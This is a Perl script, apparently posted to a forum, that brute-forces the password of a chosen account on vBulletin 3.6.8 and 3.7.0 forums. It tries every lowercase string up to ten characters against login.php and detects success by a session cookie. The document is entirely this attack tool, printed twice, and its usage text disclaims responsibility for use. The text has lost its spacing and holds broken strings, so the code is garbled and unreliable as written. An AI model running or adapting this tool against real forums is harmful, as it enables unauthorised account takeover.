[php]#!/usr/bin/perl
useIO::Socket;
useLWP::UserAgent;
useHTTP::Cookies;
useTime::HiResqw(gettimeofday);
$host=$ARGV[0];
$usern=$ARGV[1];
$passw=$ARGV[2];
$uname=$ARGV[3];
$url="http://".$host;
$alpha="abcdefghijklmnopqrstuvwxyz";
$dbgtmr="1";#Intervallofshowingthecurrentspeed+las tpasswordinseconds.
if(@ARGV<4){
print"#Iamnotresponsibleforanythingthatyoudowithth is!\n";
print"#ThishasbeentestedonvBulletin3.6.8and3.7.0!\ n";
print"#usage:vbrute.pl[host&path][user][pass][target]\n";
print"#E.g:vbrute.plwww.milw0rm.com/vBulletin3.6.8/UnnamedOneMyPassstr0ke\n";
exit();
}
for(my$t=1;$t<=10;$t++)
{
crack($t);
}
subfakelogin
{
$xplr=LWP::UserAgent->new()ordie;
$cookie_jarr=HTTP::Cookies->new();
$xplr->cookie_jar($cookie_jarr);
$resr=$xplr->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"Lala",
"vb_login_password"=>"lalala",
"do"=>"login",
],);
}
subcrack
{
$xpl=LWP::UserAgent->new()ordie;
$cookie_jar=HTTP::Cookies->new();
$CharSet=shift;
@RawString=();
for(my$i=0;$i<$CharSet;$i++)
{
$RawString[i]=0;
}
$Start=gettimeofday();
do
{
for(my$i=0;$i<$CharSet;$i++)
{
if($RawString[$i]>length($alpha)-1)
{
if($i==$CharSet-1)
{
print"Bruteforcingdonewith$CharSetChars.NoResults. \n";
$cnt=0;
returnfalse;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret="";
for(my$i=0;$i<$CharSet;$i++)
{
$ret=$ret.substr($alpha,$RawString[$i],1);
}
fakelogin();
$xpl->cookie_jar($cookie_jar);
$res=$xpl->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"$uname",
"vb_login_password"=>"$ret",
"do"=>"login",
],);
$cnt++;
$Stop=gettimeofday();
if($Stop-$Start>$dbgtmr)
{
$cnt=int($cnt/$dbgtmr);
print"$cntpasswords\\second.\tLastPass'$ret'\n";
$cnt=0;
$Start=gettimeofday();
}
print"!=$ret\n";
if($cookie_jar->as_string=~/IDstack=(.*?);/)
{
print"Passwordcracked!=>$ret\n";
exit();
}
#checkhash($CharSet)."\n";
$RawString[0]++;
}
while($RawString[$CharSet-1]<length($alpha));
}
subcheckhash
{
$xpl=LWP::UserAgent->new()ordie;
$cookie_jar=HTTP::Cookies->new();
$CharSet=shift;
$ret="";
for(my$i=0;$i<$CharSet;$i++)
{
$ret=$ret.substr($alpha,$RawString[$i],1);
}
fakelogin();
$xpl->cookie_jar($cookie_jar);
$res=$xpl->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"$uname",
"vb_login_password"=>"$ret",
"do"=>"login",
],);
$cnt++;
$Stop=gettimeofday();
if($Stop-$Start>$dbgtmr)
{
$cnt=int($cnt/$dbgtmr);
print"$cntpasswords\\second.\tLastPass'$retn";
$cnt=0;
$Start=gettimeofday();
}
if($cookie_jar->as_string=~/IDstack=(.*?);/)
{
print"Passwordcracked!=>$retn";
exit();
}
}[/php]
useIO::Socket;
useLWP::UserAgent;
useHTTP::Cookies;
useTime::HiResqw(gettimeofday);
$host=$ARGV[0];
$usern=$ARGV[1];
$passw=$ARGV[2];
$uname=$ARGV[3];
$url="http://".$host;
$alpha="abcdefghijklmnopqrstuvwxyz";
$dbgtmr="1";#Intervallofshowingthecurrentspeed+las tpasswordinseconds.
if(@ARGV<4){
print"#Iamnotresponsibleforanythingthatyoudowithth is!\n";
print"#ThishasbeentestedonvBulletin3.6.8and3.7.0!\ n";
print"#usage:vbrute.pl[host&path][user][pass][target]\n";
print"#E.g:vbrute.plwww.milw0rm.com/vBulletin3.6.8/UnnamedOneMyPassstr0ke\n";
exit();
}
for(my$t=1;$t<=10;$t++)
{
crack($t);
}
subfakelogin
{
$xplr=LWP::UserAgent->new()ordie;
$cookie_jarr=HTTP::Cookies->new();
$xplr->cookie_jar($cookie_jarr);
$resr=$xplr->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"Lala",
"vb_login_password"=>"lalala",
"do"=>"login",
],);
}
subcrack
{
$xpl=LWP::UserAgent->new()ordie;
$cookie_jar=HTTP::Cookies->new();
$CharSet=shift;
@RawString=();
for(my$i=0;$i<$CharSet;$i++)
{
$RawString[i]=0;
}
$Start=gettimeofday();
do
{
for(my$i=0;$i<$CharSet;$i++)
{
if($RawString[$i]>length($alpha)-1)
{
if($i==$CharSet-1)
{
print"Bruteforcingdonewith$CharSetChars.NoResults. \n";
$cnt=0;
returnfalse;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret="";
for(my$i=0;$i<$CharSet;$i++)
{
$ret=$ret.substr($alpha,$RawString[$i],1);
}
fakelogin();
$xpl->cookie_jar($cookie_jar);
$res=$xpl->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"$uname",
"vb_login_password"=>"$ret",
"do"=>"login",
],);
$cnt++;
$Stop=gettimeofday();
if($Stop-$Start>$dbgtmr)
{
$cnt=int($cnt/$dbgtmr);
print"$cntpasswords\\second.\tLastPass'$ret'\n";
$cnt=0;
$Start=gettimeofday();
}
print"!=$ret\n";
if($cookie_jar->as_string=~/IDstack=(.*?);/)
{
print"Passwordcracked!=>$ret\n";
exit();
}
#checkhash($CharSet)."\n";
$RawString[0]++;
}
while($RawString[$CharSet-1]<length($alpha));
}
subcheckhash
{
$xpl=LWP::UserAgent->new()ordie;
$cookie_jar=HTTP::Cookies->new();
$CharSet=shift;
$ret="";
for(my$i=0;$i<$CharSet;$i++)
{
$ret=$ret.substr($alpha,$RawString[$i],1);
}
fakelogin();
$xpl->cookie_jar($cookie_jar);
$res=$xpl->post($url.'login.php?do=login',
Content=>[
"vb_login_username"=>"$uname",
"vb_login_password"=>"$ret",
"do"=>"login",
],);
$cnt++;
$Stop=gettimeofday();
if($Stop-$Start>$dbgtmr)
{
$cnt=int($cnt/$dbgtmr);
print"$cntpasswords\\second.\tLastPass'$retn";
$cnt=0;
$Start=gettimeofday();
}
if($cookie_jar->as_string=~/IDstack=(.*?);/)
{
print"Passwordcracked!=>$retn";
exit();
}
}[/php]